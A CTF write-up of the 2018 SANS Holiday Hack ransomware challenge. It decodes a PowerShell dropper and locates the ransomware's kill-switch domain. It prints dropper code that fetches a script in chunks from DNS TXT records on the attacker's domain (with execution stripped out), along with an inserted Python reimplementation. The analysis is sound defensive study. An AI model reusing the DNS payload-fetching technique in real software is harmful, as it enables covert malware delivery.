Salaheldin

March 14, 2019

Stop the Malware

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup

📍 Use the Cookie Recipe document to find the killswitch domain, then the HoHoHo daddy terminal to register the domain; the terminal is beside the Snort terminal.


Unfortunately, Snort alerts show multiple domains, so blocking that one won’t be effective.

I remember another ransomware in recent history had a killswitch domain that, when registered, would prevent any further infections.

Perhaps there is a mechanism like that in this ransomware? Do some more analysis and see if you can find a fatal flaw and activate it!


Ransomware Kill Switches:

I think I remember reading an article recently about Ransomware Kill Switches. Wouldn't it be nice if our ransomware had one!

https://www.wired.com/2017/05/accidental-kill-switch-slowed-fridays-massive-ransomware-attack/



01- Let's continue the analysis of our malware file:

First, edit source-1.ps1 and remove the iex call, so that the downloaded PowerShell file wannacookie.min.ps1 is written out instead of being executed after download:

The code after editing:

function H2A($a) {$o; $a -split '(..)' | ? { $_ } | forEach {[char]([convert]::toint16($_,16))} | forEach {$o = $o + $_}; return $o}
$f = "77616E6E61636F6F6B69652E6D696E2E707331"   # hex for "wannacookie.min.ps1"
$h = ""
foreach ($i in 0..([convert]::ToInt32((Resolve-DnsName -Server erohetfanu.com -Name "$f.erohetfanu.com" -Type TXT).strings, 10)-1)) {$h += (Resolve-DnsName -Server erohetfanu.com -Name "$i.$f.erohetfanu.com" -Type TXT).strings}
# iex removed: emit the decoded script as text instead of executing it
$(H2A $h | Out-string)


02- Let's run the modified code and export the result to wannacookie.min.ps1 by adding | out-file wannacookie.min.ps1 at the end of our command:

.\source-1.ps1 | out-file wannacookie.min.ps1

It will take some time; wait until it finishes.


03- Let's look at wannacookie.min.ps1:

type .\wannacookie.min.ps1

It's hard to read here, so let's look at it in Visual Studio Code: open the file in Visual Studio Code and clean it up (reformat the minified one-liner) to get a better view.


04- Let’s read the code after we cleaned it:

  • AES Encryption function e_d_file
  • Conversion functions H2B , A2H , H2A , B2H, ti_rox
  • Compression function B2G
  • Decompress function G2B
  • Hashing function sh1
  • Encrypt function using PublicKey p_k_e
  • Encrypt and Decrypt function e_n_d
  • Get using DNS function g_o_dns
  • Split function s_2_c
  • Send using DNS function snd_k
  • The Main function wanc


05- We are looking for a kill switch domain, like the one in the WannaCry malware, that stops this ransomware before it runs; such a check has to be at the beginning of the main function:

A. Let's take a look at the first code in the main function:

This line makes a DNS request using $S1 after a few functions convert and compress it, and sends the query to the Google DNS server 8.8.8.8. If the answer is not null ($null -ne), the rest of the code keeps running, but if the answer is null, the code exits and stops running.

The -ErrorAction 0 option makes the query silently continue even if there is an error.

return means exit the current scope, which can be a function, script, or script block.

This seems to be our kill switch, so we need to figure out what the DNS query name is.

B. From the previous steps you will notice that the malware makes DNS requests with a subdomain in the query name that identifies which file or message is needed; here the request uses this code: 6B696C6C737769746368

C. Let's decode it from hex as before:

6B696C6C737769746368 > killswitch

So this confirms that the kill switch domain must be in this code block.

D. Let's use PowerShell ISE to set breakpoints, view the data as it is transmitted, and call functions from the malware script.

E. Run PowerShell ISE and open the file wannacookie.min.ps1, then extract the query name from the script block, add it on a new line after $S1, and assign it to $ks.


Also add a breakpoint after the $ks line to stop the script, then run it.

In the bottom console, type $ks to print the domain name used in the DNS query.


We found it! yippeekiyaa.aaay
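As an added example that is not part of the original writeup or of the malware itself, here is a Python reimplementation of the two pieces of DNS handling walked through above: the hex-encoded query labels from step 05 (B and C) and the TXT-chunk download loop from step 01, written the way an analyst would check DNS log entries offline. The zone name and hex labels are taken from the writeup; the TXT record contents, the sample payload and the function names are my own constructed assumptions, so it runs without any network access.

```python
import re

ZONE = "erohetfanu.com"                       # zone used by the dropper in the writeup
HEX_LABEL = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")

def h2a(hex_str: str) -> str:
    """Python equivalent of the dropper's H2A(): each hex pair becomes one char."""
    return bytes.fromhex(hex_str).decode("latin-1")

def a2h(text: str) -> str:
    """Inverse of h2a (the script's A2H): builds the hex label for a filename."""
    return text.encode("latin-1").hex().upper()

def decode_query(qname: str, zone: str = ZONE):
    """Decode one DNS query name under the zone. Returns (chunk_index, text),
    with chunk_index None for a bare <hex>.zone request, or None if the name
    does not follow the <hex>.zone / <n>.<hex>.zone pattern."""
    labels = qname.rstrip(".").lower().split(".")
    zone_labels = zone.lower().split(".")
    if labels[-len(zone_labels):] != zone_labels:
        return None
    sub = labels[:-len(zone_labels)]
    idx = None
    if len(sub) == 2 and sub[0].isdigit():
        idx, sub = int(sub[0]), sub[1:]
    if len(sub) != 1 or not HEX_LABEL.match(sub[0]):
        return None
    return idx, h2a(sub[0])

def reassemble(txt_records: dict, filename: str, zone: str = ZONE) -> str:
    """Mirror the dropper loop: TXT at <hex>.zone is the chunk count (base 10),
    TXT at <i>.<hex>.zone is hex chunk i; joining and decoding yields the file."""
    f = a2h(filename)
    count = int(txt_records[f"{f}.{zone}"], 10)
    return h2a("".join(txt_records[f"{i}.{f}.{zone}"] for i in range(count)))

# Constructed TXT records: a harmless two-chunk stand-in for the real script.
SAMPLE_PAYLOAD = "Write-Host 'constructed sample'"
_f, _hex = a2h("wannacookie.min.ps1"), a2h(SAMPLE_PAYLOAD)
FAKE_TXT = {f"{_f}.{ZONE}": "2", f"0.{_f}.{ZONE}": _hex[:20], f"1.{_f}.{ZONE}": _hex[20:]}

if __name__ == "__main__":
    # Query names taken from the writeup decode to the message and file names.
    print(decode_query("6B696C6C737769746368.erohetfanu.com"))
    print(decode_query("3.77616E6E61636F6F6B69652E6D696E2E707331.erohetfanu.com"))
    print(reassemble(FAKE_TXT, "wannacookie.min.ps1"))
```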

06- Go to the HoHoHo daddy terminal and register the domain "yippeekiyaa.aaay" to stop the malware from causing new infections.

Yippee-Ki-Yay! Now, I have a ma... kill-switch!